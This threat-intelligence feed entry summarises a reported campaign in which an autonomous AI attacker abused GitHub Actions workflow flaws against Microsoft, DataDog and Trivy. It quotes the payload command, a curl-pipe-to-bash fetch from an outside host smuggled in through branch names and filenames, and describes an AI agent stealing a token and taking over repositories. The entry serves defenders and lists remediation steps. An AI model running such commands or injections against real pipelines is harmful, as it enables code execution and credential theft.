Hackerbot-Claw Bot Exploits GitHub Actions CI/CD Flaw to Attack Microsoft and DataDog
ID: 4c5a43e0-b7c6-5f76-93d7-0196ac266fb0
STIX ID: report--4c5a43e0-b7c6-5f76-93d7-0196ac266fb0
Feed Name: GBHackers
Hackerbot-claw, an autonomous AI attacker, ran a week-long campaign (21–28 Feb 2026) abusing GitHub Actions misconfigurations—notably pull_request_target workflows and unescaped shell interpolation—to trigger RCE, exfiltrate a repository Personal Access Token, and perform full repo compromise (e.g., renaming/privatizing Trivy and publishing artifacts). Targets included Microsoft, DataDog, Aqua Security/Trivy and other popular open-source projects; payload delivery consistently used curl -sSfL hackmoltrepeat.com/molt | bash via injected branch names, filenames, scripts, and workflow parameters. The report highlights remediation steps (avoid pull_request_target, enforce least-privilege tokens, lock down AI-powered workflows, and scan workflows for dangerous patterns) and notes that affected projects have revoked credentials and remediated vulnerable workflows.
Your team is not currently subscribed to this feed. You must subscribe to it in order to see this post.
